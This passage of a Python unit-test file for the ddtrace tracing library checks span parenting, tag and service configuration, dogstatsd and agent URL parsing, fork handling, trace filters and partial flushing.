    s2 = self.trace("bar")

    # s2 must not be parented to the already-finished s1
    self.assertIsNone(s2._parent)
    s2.finish()
    self.assertIsNone(p1)
def test_tracer_global_tags(self):
    """Tags registered via ``tracer.set_tags`` apply to spans created
    afterwards, and later calls merge with/override earlier tags."""
    # No global tags yet: span carries neither key.
    before = self.trace("brie")
    before.finish()
    assert before.get_tag("env") is None
    assert before.get_tag("other") is None

    # One global tag set.
    self.tracer.set_tags({"env": "prod"})
    single = self.trace("camembert")
    single.finish()
    assert single.get_tag("env") == "prod"
    assert single.get_tag("other") is None

    # Second call overrides "env" and adds "other".
    self.tracer.set_tags({"env": "staging", "other": "tag"})
    merged = self.trace("gruyere")
    merged.finish()
    assert merged.get_tag("env") == "staging"
    assert merged.get_tag("other") == "tag"
def test_global_context(self):
    """The tracer's call context should reflect the currently active span."""
    # the tracer uses a global thread-local Context
    span = self.trace("fake_span")
    ctx = self.tracer.get_call_context()
    assert ctx.trace_id == span.trace_id
    assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
    """``current_span`` should return the active span, whether the span was
    started manually or via a context manager."""
    # the current span is in the local Context()
    span = self.trace("fake_span")
    assert self.tracer.current_span() == span
    span.finish()

    with self.trace("fake_span") as span:
        assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
    """With no active trace, ``current_span`` returns ``None``."""
    self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
    """With no active trace, ``current_root_span`` returns ``None``."""
    self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
    """The default context provider returns a ``Context`` even when none
    has been activated yet."""
    # Tracer Context Provider must return a Context object
    # even if empty
    ctx = self.tracer.context_provider.active()
    assert isinstance(ctx, Context)
def test_default_provider_set(self):
    """An activated Context (e.g. from distributed tracing headers) should
    parent the next span started by the tracer."""
    # The Context Provider can set the current active Context;
    # this could happen in distributed tracing
    ctx = Context(trace_id=42, span_id=100)
    self.tracer.context_provider.activate(ctx)
    span = self.trace("web.request")
    span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
    """``start_span`` creates a root span that is written on finish."""
    # it should create a root Span
    span = self.tracer.start_span("web.request")
    assert span.name == "web.request"
    assert span.parent_id is None
    span.finish()
    spans = self.tracer.writer.pop()
    assert len(spans) == 1
    assert spans[0] is span
def test_start_span_optional(self):
    """``start_span`` accepts optional service/resource/span_type arguments."""
    # it should create a root Span with arguments
    with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
        pass
    span.assert_matches(
        name="web.request",
        service="web",
        resource="/",
        span_type="http",
    )
def test_start_span_service_default(self):
    """With no service configured anywhere, a span has no service."""
    span = self.start_span("")
    span.assert_matches(service=None)
    span.finish()
def test_start_span_service_from_parent(self):
    """A child span inherits its parent's service when it sets none itself."""
    with self.start_span("parent", service="mysvc") as parent:
        with self.start_span("child", child_of=parent) as child:
            pass
    child.assert_matches(
        name="child",
        service="mysvc",
    )
def test_start_span_service_global_config(self):
    """The global ``config.service`` is used when no service is provided."""
    # When no service is provided a default
    with self.override_global_config(dict(service="mysvc")):
        with self.start_span("") as span:
            span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
    """The parent's service wins over the global ``config.service``."""
    # Parent should have precedence over global config
    with self.override_global_config(dict(service="mysvc")):
        with self.start_span("parent", service="parentsvc") as parent:
            with self.start_span("child", child_of=parent) as child:
                pass
        child.assert_matches(
            name="child",
            service="parentsvc",
        )
def test_start_child_span(self):
    """``start_span(child_of=parent)`` parents the span explicitly without
    making either span the tracer's "current" span."""
    # it should create a child Span for the given parent
    with self.start_span("web.request") as parent:
        assert self.tracer.current_span() is None
        with self.start_span("web.worker", child_of=parent) as child:
            assert self.tracer.current_span() is None

    parent.assert_matches(
        name="web.request",
        parent_id=None,
        _parent=None,
        tracer=self.tracer,
    )
    child.assert_matches(
        name="web.worker",
        parent_id=parent.span_id,
        _parent=parent,
        tracer=self.tracer,
    )
def test_start_child_span_attributes(self):
    """A child created with ``child_of`` inherits the parent's service."""
    # it should create a child Span with parent's attributes
    with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
        with self.start_span("web.worker", child_of=parent) as child:
            child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
    """Passing a span's ``context`` as ``child_of`` parents the new span to
    that context's trace and span ids."""
    # it should create a child span with a populated Context
    with self.start_span("web.request") as root:
        with self.start_span("web.worker", child_of=root.context) as child:
            pass
    child.assert_matches(
        name="web.worker",
        parent_id=root.span_id,
        trace_id=root.trace_id,
        _parent=root,
        tracer=self.tracer,
    )
def test_adding_services(self):
    """Each distinct service used by a span is accumulated in
    ``tracer._services``."""
    assert self.tracer._services == set()
    with self.start_span("root", service="one") as root:
        assert self.tracer._services == set(["one"])
        with self.start_span("child", service="two", child_of=root):
            pass
    assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
    """The runtime-metrics worker only starts once ``collect_metrics`` is
    enabled via ``tracer.configure``."""
    # by default runtime worker not started though runtime id is set
    self.assertIsNone(self.tracer._runtime_worker)

    # configure tracer with runtime metrics collection
    self.tracer.configure(collect_metrics=True)
    self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
    """``dogstatsd_host`` still configures the client (default port 8125)
    but must emit a deprecation warning pointing at ``dogstatsd_url``."""
    with warnings.catch_warnings(record=True) as ws:
        warnings.simplefilter("always")

        self.tracer.configure(dogstatsd_host="foo")
        assert self.tracer._dogstatsd_client.host == "foo"
        assert self.tracer._dogstatsd_client.port == 8125

        # verify warnings triggered
        assert len(ws) >= 1
        for w in ws:
            if issubclass(w.category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning):
                assert "Use `dogstatsd_url`" in str(w.message)
                break
        else:
            assert 0, "dogstatsd warning not found"
def test_configure_dogstatsd_host_port(self):
    """Passing both deprecated ``dogstatsd_host`` and ``dogstatsd_port``
    configures the client and raises one deprecation warning per argument."""
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")

        self.tracer.configure(dogstatsd_host="foo", dogstatsd_port="1234")
        assert self.tracer._dogstatsd_client.host == "foo"
        assert self.tracer._dogstatsd_client.port == 1234

        # verify warnings triggered
        assert len(w) >= 2
        assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
        assert "Use `dogstatsd_url`" in str(w[0].message)
        assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
        assert "Use `dogstatsd_url`" in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
    """A ``host:port`` dogstatsd URL sets the client host and port."""
    self.tracer.configure(dogstatsd_url="foo:1234")
    assert self.tracer._dogstatsd_client.host == "foo"
    assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
    """A ``unix://`` dogstatsd URL selects a socket path instead of host/port."""
    self.tracer.configure(dogstatsd_url="unix:///foo.sock")
    assert self.tracer._dogstatsd_client.host is None
    assert self.tracer._dogstatsd_client.port is None
    assert self.tracer._dogstatsd_client.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
    """With runtime metrics disabled, no ``language`` tag is added to spans."""
    self.tracer.configure(collect_metrics=False)

    with self.start_span("root") as root:
        with self.start_span("child", child_of=root.context) as child:
            pass

    self.assertIsNone(root.get_tag("language"))
    self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
    """For internal span types, only the root span gets the ``language`` tag
    when runtime metrics are enabled."""
    self.tracer.configure(collect_metrics=True)
    for span_type in ("custom", "template", "web", "worker"):
        with self.start_span("root", span_type=span_type) as root:
            with self.start_span("child", child_of=root) as child:
                pass
        assert root.get_tag("language") == "python"
        assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
    """For external/integration span types, neither root nor child spans
    should get the ``language`` tag, even with runtime metrics enabled."""
    self.tracer.configure(collect_metrics=True)
    for span_type in (
        "algoliasearch.search",
        "boto",
        "cache",
        "cassandra",
        "elasticsearch",
        "grpc",
        "kombu",
        "http",
        "memcached",
        "redis",
        "sql",
        "vertica",
    ):
        with self.start_span("root", span_type=span_type) as root:
            with self.start_span("child", child_of=root) as child:
                pass
        assert root.get_tag("language") is None
        assert child.get_tag("language") is None
def test_tracer_url():
    """``Tracer(url=...)`` should configure the writer's hostname, port,
    UDS path and TLS flag, with scheme-based port defaults, and reject
    unknown schemes with a ``ValueError``."""
    t = ddtrace.Tracer()
    assert t.writer._hostname == "localhost"
    assert t.writer._port == 8126

    t = ddtrace.Tracer(url="http://foobar:12")
    assert t.writer._hostname == "foobar"
    assert t.writer._port == 12

    t = ddtrace.Tracer(url="unix:///foobar")
    assert t.writer._uds_path == "/foobar"

    # Default ports are inferred from the scheme.
    t = ddtrace.Tracer(url="http://localhost")
    assert t.writer._hostname == "localhost"
    assert t.writer._port == 80
    assert not t.writer._https

    t = ddtrace.Tracer(url="https://localhost")
    assert t.writer._hostname == "localhost"
    assert t.writer._port == 443
    assert t.writer._https

    with pytest.raises(ValueError) as e:
        ddtrace.Tracer(url="foo://foobar:12")
    # `e` is a pytest ExceptionInfo; the raised exception is `e.value`, and
    # the reported unknown scheme must match the URL actually used ("foo").
    assert str(e.value) == "Unknown scheme `foo` for agent URL"
def test_tracer_shutdown_no_timeout():
    """``shutdown`` must not stop/join the writer thread before it has been
    started by a first write; afterwards it stops and joins without timeout."""
    t = ddtrace.Tracer()
    t.writer = mock.Mock(wraps=t.writer)

    # The writer thread does not start until the first write.
    t.shutdown()
    assert not t.writer.stop.called
    assert not t.writer.join.called

    # Do a write to start the writer.
    with t.trace("something"):
        pass

    t.shutdown()
    t.writer.stop.assert_called_once_with()
    t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_configure_writer_stop_unstarted():
    """Reconfiguring the tracer must not call ``stop`` on a writer that was
    never started."""
    t = ddtrace.Tracer()
    t.writer = mock.Mock(wraps=t.writer)
    orig_writer = t.writer

    # Make sure we aren't calling stop for an unstarted writer
    t.configure(hostname="localhost", port=8126)
    assert not orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
    """Reconfiguring the tracer must stop a writer that was already started
    by a previous write."""
    t = ddtrace.Tracer()
    t.writer = mock.Mock(wraps=t.writer)
    orig_writer = t.writer

    # Do a write to start the writer
    with t.trace("something"):
        pass

    t.configure(hostname="localhost", port=8126)
    orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
    """``shutdown(timeout=...)`` should forward the timeout to the writer
    thread's ``join``."""
    t = ddtrace.Tracer()
    t.writer = mock.Mock(wraps=t.writer)

    with t.trace("something"):
        pass

    t.shutdown(timeout=2)
    t.writer.stop.assert_called_once_with()
    t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
    """``Tracer(dogstatsd_url=...)`` should accept host:port, udp:// and
    unix socket forms, and reject unknown URL formats with ``ValueError``."""
    t = ddtrace.Tracer()
    assert t._dogstatsd_client.host == "localhost"
    assert t._dogstatsd_client.port == 8125

    t = ddtrace.Tracer(dogstatsd_url="foobar:12")
    assert t._dogstatsd_client.host == "foobar"
    assert t._dogstatsd_client.port == 12

    t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
    assert t._dogstatsd_client.host == "foobar"
    assert t._dogstatsd_client.port == 12

    t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
    assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"

    t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
    assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"

    with pytest.raises(ValueError) as e:
        t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
    # `e` is a pytest ExceptionInfo wrapper — compare against the raised
    # exception (`e.value`), not the wrapper itself.
    assert str(e.value) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
    """After a fork, the child process must get a fresh writer and buffer,
    while the parent keeps writing to its original writer.

    Assertion failures inside the child cannot fail the parent test
    directly, so they are shipped back through a multiprocessing queue.
    """
    t = ddtrace.Tracer()
    original_pid = t._pid
    original_writer = t.writer

    @contextlib.contextmanager
    def capture_failures(errors):
        try:
            yield
        except AssertionError as e:
            errors.put(e)

    def task(t, errors):
        # Start a new span to trigger process checking
        with t.trace("test", service="test"):
            # Assert we recreated the writer and have a new queue
            with capture_failures(errors):
                assert t._pid != original_pid
                assert t.writer != original_writer
                assert t.writer._buffer != original_writer._buffer

        # Assert the trace got written into the correct queue
        assert len(original_writer._buffer) == 0
        assert len(t.writer._buffer) == 1

    # Assert tracer in a new process correctly recreates the writer
    errors = multiprocessing.Queue()
    p = multiprocessing.Process(target=task, args=(t, errors))
    try:
        p.start()
    finally:
        p.join(timeout=2)

    assert errors.empty(), errors.get()

    # Ensure writing into the tracer in this process still works as expected
    with t.trace("test", service="test"):
        assert t._pid == original_pid
        assert t.writer == original_writer
        assert t.writer._buffer == original_writer._buffer

    # Assert the trace got written into the correct queue
    assert len(original_writer._buffer) == 1
    assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
    """
    When a trace is started in a parent process and a child process is spawned
        The trace should be continued in the child process
    """
    tracer = ddtrace.Tracer()
    tracer.writer = DummyWriter()

    def task(tracer, q):
        # Use an in-memory writer in the child so we can inspect the spans.
        tracer.writer = DummyWriter()
        with tracer.trace("child"):
            pass
        spans = tracer.writer.pop()
        q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])

    # Assert tracer in a new process correctly recreates the writer
    q = multiprocessing.Queue()
    with tracer.trace("parent") as parent:
        p = multiprocessing.Process(target=task, args=(tracer, q))
        p.start()
        p.join()

    children = q.get()
    assert len(children) == 1
    (child,) = children
    # Child span must continue the parent's trace across the fork boundary.
    assert parent.trace_id == child["trace_id"]
    assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
    """
    When a trace is started and crosses multiple process boundaries
        The trace should be continued in the child processes
    """
    tracer = ddtrace.Tracer()
    tracer.writer = DummyWriter()

    # Start a span in this process then start a child process which itself
    # starts a span and spawns another child process which starts a span.
    def task(tracer, q):
        tracer.writer = DummyWriter()

        def task2(tracer, q):
            tracer.writer = DummyWriter()

            with tracer.trace("child2"):
                pass

            spans = tracer.writer.pop()
            q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])

        with tracer.trace("child1"):
            q2 = multiprocessing.Queue()
            p = multiprocessing.Process(target=task2, args=(tracer, q2))
            p.start()
            p.join()
            task2_spans = q2.get()

        spans = tracer.writer.pop()
        # child1's record (with span_id) first, then the grandchild's.
        q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)

    # Assert tracer in a new process correctly recreates the writer
    q = multiprocessing.Queue()
    with tracer.trace("parent") as parent:
        p = multiprocessing.Process(target=task, args=(tracer, q))
        p.start()
        p.join()

    children = q.get()
    assert len(children) == 2
    child1, child2 = children
    # All three spans share one trace; the chain is parent -> child1 -> child2.
    assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
    assert child1["parent_id"] == parent.span_id
    assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
    """The ``version`` tag comes from global config, can be overridden per
    span, and global config wins over a tracer-level tag."""
    t = ddtrace.Tracer()

    # With global `config.version` defined
    with override_global_config(dict(version="1.2.3")):
        with t.trace("test.span") as span:
            assert span.get_tag(VERSION_KEY) == "1.2.3"

            # override manually
            span.set_tag(VERSION_KEY, "4.5.6")
            assert span.get_tag(VERSION_KEY) == "4.5.6"

    # With no `config.version` defined
    with t.trace("test.span") as span:
        assert span.get_tag(VERSION_KEY) is None

        # explicitly set in the span
        span.set_tag(VERSION_KEY, "1.2.3")
        assert span.get_tag(VERSION_KEY) == "1.2.3"

    # With global tags set
    t.set_tags({VERSION_KEY: "tags.version"})
    with override_global_config(dict(version="config.version")):
        with t.trace("test.span") as span:
            assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
    """The ``env`` tag comes from global config, can be overridden per span,
    and global config wins over a tracer-level tag."""
    t = ddtrace.Tracer()

    # With global `config.env` defined
    with override_global_config(dict(env="prod")):
        with t.trace("test.span") as span:
            assert span.get_tag(ENV_KEY) == "prod"

            # override manually
            span.set_tag(ENV_KEY, "prod-staging")
            assert span.get_tag(ENV_KEY) == "prod-staging"

    # With no `config.env` defined
    with t.trace("test.span") as span:
        assert span.get_tag(ENV_KEY) is None

        # explicitly set in the span
        span.set_tag(ENV_KEY, "prod-staging")
        assert span.get_tag(ENV_KEY) == "prod-staging"

    # With global tags set
    t.set_tags({ENV_KEY: "tags.env"})
    with override_global_config(dict(env="config.env")):
        with t.trace("test.span") as span:
            assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
    """Tracer test cases requiring environment variables.

    Each test runs in a subprocess (via ``run_in_subprocess``) so the
    environment overrides are seen at ddtrace import/initialization time.
    """

    @run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
    def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
        """
        When DATADOG_SERVICE_NAME is provided
            It should not be used by default
            It should be used with config._get_service()
        """
        from ddtrace import config

        assert config.service is None
        with self.start_span("") as s:
            s.assert_matches(service=None)
        with self.start_span("", service=config._get_service()) as s:
            s.assert_matches(service="mysvc")

    @run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
    def test_service_name_legacy_DD_SERVICE_NAME(self):
        """
        When DD_SERVICE_NAME is provided
            It should not be used by default
            It should be used with config._get_service()
        """
        from ddtrace import config

        assert config.service is None
        with self.start_span("") as s:
            s.assert_matches(service=None)
        with self.start_span("", service=config._get_service()) as s:
            s.assert_matches(service="mysvc")

    @run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
    def test_service_name_env(self):
        """DD_SERVICE should be applied to spans by default."""
        with self.start_span("") as span:
            pass
        span.assert_matches(
            service="mysvc",
        )

    @run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
    def test_service_name_env_global_config(self):
        # Global config should have higher precedence than the environment variable
        with self.override_global_config(dict(service="overridesvc")):
            with self.start_span("") as span:
                pass
        span.assert_matches(
            service="overridesvc",
        )

    @run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
    def test_version_no_global_service(self):
        # Version should be set if no service name is present
        with self.trace("") as span:
            span.assert_matches(
                meta={
                    VERSION_KEY: "0.1.2",
                },
            )

        # The version will not be tagged if the service is not globally
        # configured.
        with self.trace("root", service="rootsvc") as root:
            assert VERSION_KEY not in root.meta
            with self.trace("child") as span:
                assert VERSION_KEY not in span.meta

    @run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
    def test_version_service(self):
        # Fleshed out example of service and version tagging

        # Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
        with self.trace("django.request") as root:
            # Root span should be tagged
            assert root.service == "django"
            assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"

            # Child spans should be tagged
            with self.trace("") as child1:
                assert child1.service == "django"
                assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"

            # Version should not be applied to spans of a service that isn't user-defined
            with self.trace("mysql.query", service="mysql") as span:
                assert VERSION_KEY not in span.meta
                # Child should also not have a version
                with self.trace("") as child2:
                    assert child2.service == "mysql"
                    assert VERSION_KEY not in child2.meta

    @run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
    def test_detect_agentless_env(self):
        """In a Lambda environment with no agent host, a log writer is used."""
        assert isinstance(self.tracer.original_writer, LogWriter)

    @run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
    def test_detect_agent_config(self):
        """An explicit agent host wins over Lambda agentless detection."""
        assert isinstance(self.tracer.original_writer, AgentWriter)

    @run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
    def test_dd_tags(self):
        """DD_TAGS key:value pairs become tracer-level tags."""
        assert self.tracer.tags["key1"] == "value1"
        assert self.tracer.tags["key2"] == "value2"

    @run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
    def test_dd_tags_invalid(self):
        """Entries without a value (no colon) are dropped from DD_TAGS."""
        assert "key1" in self.tracer.tags
        assert "key2" in self.tracer.tags
        assert "key3" not in self.tracer.tags

    @run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
    def test_tags_from_DD_TAGS(self):
        """service/env/version supplied via DD_TAGS apply to spans."""
        t = ddtrace.Tracer()
        with t.trace("test") as s:
            assert s.service == "mysvc"
            assert s.get_tag("env") == "myenv"
            assert s.get_tag("version") == "myvers"

    @run_in_subprocess(
        env_overrides=dict(
            DD_TAGS="service:s,env:e,version:v",
            DD_ENV="env",
            DD_SERVICE="svc",
            DD_VERSION="0.123",
        )
    )
    def test_tags_from_DD_TAGS_precedence(self):
        """Dedicated DD_ENV/DD_SERVICE/DD_VERSION win over DD_TAGS entries."""
        t = ddtrace.Tracer()
        with t.trace("test") as s:
            assert s.service == "svc"
            assert s.get_tag("env") == "env"
            assert s.get_tag("version") == "0.123"

    @run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
    def test_tags_from_DD_TAGS_override(self):
        """Programmatic config assignments win over DD_TAGS entries."""
        t = ddtrace.Tracer()
        ddtrace.config.env = "env"
        ddtrace.config.service = "service"
        ddtrace.config.version = "0.123"
        with t.trace("test") as s:
            assert s.service == "service"
            assert s.get_tag("env") == "env"
            assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
    """Root spans carry a non-empty ``runtime-id`` tag that is shared across
    tracers in the same process."""
    t = ddtrace.Tracer()
    with t.start_span("foobar") as span:
        pass

    assert len(span.get_tag("runtime-id"))

    t2 = ddtrace.Tracer()
    with t2.start_span("foobaz") as span2:
        pass

    assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
    """A forked child process must get its own ``runtime-id``, different
    from the parent's."""
    tracer = ddtrace.Tracer()

    def task(tracer, q):
        span = tracer.start_span("foobaz")
        q.put(span.get_tag("runtime-id"))
        span.finish()

    span = tracer.start_span("foobar")
    span.finish()

    q = multiprocessing.Queue()
    p = multiprocessing.Process(target=task, args=(tracer, q))
    p.start()
    p.join()

    children_tag = q.get()
    assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
    """A hook registered with ``on_start_span`` fires for each started span
    and receives that span."""
    tracer = ddtrace.Tracer()
    captured = {}

    @tracer.on_start_span
    def store_span(span):
        captured["span"] = span

    span = tracer.start_span("hello")
    assert span == captured["span"]
    span.finish()
def test_deregister_start_span_hooks():
    """After ``deregister_on_start_span`` the hook must no longer fire."""
    tracer = ddtrace.Tracer()
    captured = {}

    @tracer.on_start_span
    def store_span(span):
        captured["span"] = span

    tracer.deregister_on_start_span(store_span)

    with tracer.start_span("hello"):
        pass

    # The deregistered hook never ran, so nothing was captured.
    assert captured == {}
def test_enable(monkeypatch):
    """The DD_TRACE_ENABLED environment variable controls whether a newly
    created tracer is enabled."""
    t1 = ddtrace.Tracer()
    assert t1.enabled

    monkeypatch.setenv("DD_TRACE_ENABLED", "false")
    t2 = ddtrace.Tracer()
    assert not t2.enabled
def test_runtime_id_parent_only():
    """Only root/parent spans carry the ``runtime-id`` tag; child spans
    must not."""
    tracer = ddtrace.Tracer()

    # Parent spans should have runtime-id
    s = tracer.trace("test")
    rtid = s.get_tag("runtime-id")
    assert isinstance(rtid, six.string_types)

    # Child spans should not
    s2 = tracer.trace("test2")
    assert s2.get_tag("runtime-id") is None
    s2.finish()
    s.finish()

    # Parent spans should have runtime-id
    s = tracer.trace("test")
    s.finish()
    rtid = s.get_tag("runtime-id")
    assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
    """After ``os.fork`` the child process gets a new ``runtime-id``.

    The child asserts inside itself and reports via its exit code (12),
    which the parent verifies with ``waitpid``.
    """
    tracer = ddtrace.Tracer()

    s = tracer.trace("test")
    s.finish()

    rtid = s.get_tag("runtime-id")
    assert isinstance(rtid, six.string_types)

    pid = os.fork()

    if pid == 0:
        # child
        s = tracer.trace("test")
        s.finish()

        rtid_child = s.get_tag("runtime-id")
        assert isinstance(rtid_child, six.string_types)
        assert rtid != rtid_child
        os._exit(12)

    _, status = os.waitpid(pid, 0)
    exit_code = os.WEXITSTATUS(status)
    assert exit_code == 12
def test_multiple_tracer_ctx():
    """Two separate Tracer instances share the thread-local context, so a
    span from one tracer parents a span from the other."""
    t1 = ddtrace.Tracer()
    t2 = ddtrace.Tracer()

    with t1.trace("") as s1:
        with t2.trace("") as s2:
            pass

    assert s2.parent_id == s1.span_id
    assert s2.trace_id == s1.trace_id
def test_filters():
    """Trace filters configured via ``settings["FILTERS"]`` can drop traces
    (by returning None), mutate them, be chained, and a filter that raises
    must not prevent the trace from being written."""
    t = ddtrace.Tracer()

    # A filter returning None drops the whole trace.
    class FilterAll(object):
        def process_trace(self, trace):
            return None

    t.configure(
        settings={
            "FILTERS": [FilterAll()],
        }
    )
    t.writer = DummyWriter()

    with t.trace("root"):
        with t.trace("child"):
            pass

    spans = t.writer.pop()
    assert len(spans) == 0

    # A filter may mutate every span of the trace and pass it through.
    class FilterMutate(object):
        def __init__(self, key, value):
            self.key = key
            self.value = value

        def process_trace(self, trace):
            for s in trace:
                s.set_tag(self.key, self.value)
            return trace

    t.configure(
        settings={
            "FILTERS": [FilterMutate("boop", "beep")],
        }
    )
    t.writer = DummyWriter()

    with t.trace("root"):
        with t.trace("child"):
            pass

    spans = t.writer.pop()
    assert len(spans) == 2
    s1, s2 = spans
    assert s1.get_tag("boop") == "beep"
    assert s2.get_tag("boop") == "beep"

    # Test multiple filters
    t.configure(
        settings={
            "FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
        }
    )
    t.writer = DummyWriter()

    with t.trace("root"):
        with t.trace("child"):
            pass

    spans = t.writer.pop()
    assert len(spans) == 2
    for s in spans:
        assert s.get_tag("boop") == "beep"
        assert s.get_tag("mats") == "sundin"

    # A filter that raises must be ignored: the trace is still written.
    class FilterBroken(object):
        def process_trace(self, trace):
            _ = 1 / 0

    t.configure(
        settings={
            "FILTERS": [FilterBroken()],
        }
    )
    t.writer = DummyWriter()

    with t.trace("root"):
        with t.trace("child"):
            pass

    spans = t.writer.pop()
    assert len(spans) == 2

    # A broken filter after a working one: the mutation still applies.
    t.configure(
        settings={
            "FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
        }
    )
    t.writer = DummyWriter()

    with t.trace("root"):
        with t.trace("child"):
            pass

    spans = t.writer.pop()
    assert len(spans) == 2
    for s in spans:
        assert s.get_tag("boop") == "beep"
def test_early_exit():
    """Finishing a parent before its child should still flush the pair as a
    single trace, and subsequent root spans must start fresh traces."""
    t = ddtrace.Tracer()
    t.writer = DummyWriter()
    s1 = t.trace("1")
    s2 = t.trace("2")
    s1.finish()
    s2.finish()

    assert s1.parent_id is None
    # Compare ids by value — `is` on integers only passes by CPython
    # object-identity accident and is not a correctness guarantee.
    assert s2.parent_id == s1.span_id

    traces = t.writer.pop_traces()
    assert len(traces) == 1
    assert len(traces[0]) == 2

    s1 = t.trace("1-1")
    s1.finish()
    assert s1.parent_id is None

    s1 = t.trace("1-2")
    s1.finish()
    assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
    """Tests for partial flushing: finished spans are flushed before the
    root finishes once DD_TRACER_PARTIAL_FLUSH_MIN_SPANS is reached."""

    @TracerTestCase.run_in_subprocess(
        env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
    )
    def test_partial_flush(self):
        """Exactly min-spans finished children flush together as one trace;
        the root flushes separately when it finishes."""
        root = self.tracer.trace("root")
        for i in range(5):
            self.tracer.trace("child%s" % i).finish()

        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 1
        assert len(traces[0]) == 5
        assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]

        root.finish()
        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 1
        assert len(traces[0]) == 1
        assert traces[0][0].name == "root"

    @TracerTestCase.run_in_subprocess(
        env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
    )
    def test_partial_flush_too_many(self):
        """With min-spans of 1, every finished child flushes on its own."""
        root = self.tracer.trace("root")
        for i in range(5):
            self.tracer.trace("child%s" % i).finish()

        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 5
        for t in traces:
            assert len(t) == 1
        assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]

        root.finish()
        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 1
        assert traces[0][0].name == "root"

    @TracerTestCase.run_in_subprocess(
        env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
    )
    def test_partial_flush_too_few(self):
        """Below the min-spans threshold nothing flushes until the root
        finishes, then the whole trace flushes at once."""
        root = self.tracer.trace("root")
        for i in range(5):
            self.tracer.trace("child%s" % i).finish()

        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 0
        root.finish()
        traces = self.tracer.writer.pop_traces()
        assert len(traces) == 1
        assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
    """Non-ASCII values in config (version/env) must not break tracing or
    shutdown/encoding."""
    t = ddtrace.Tracer()

    with override_global_config(dict(version=u"😇", env=u"😇")):
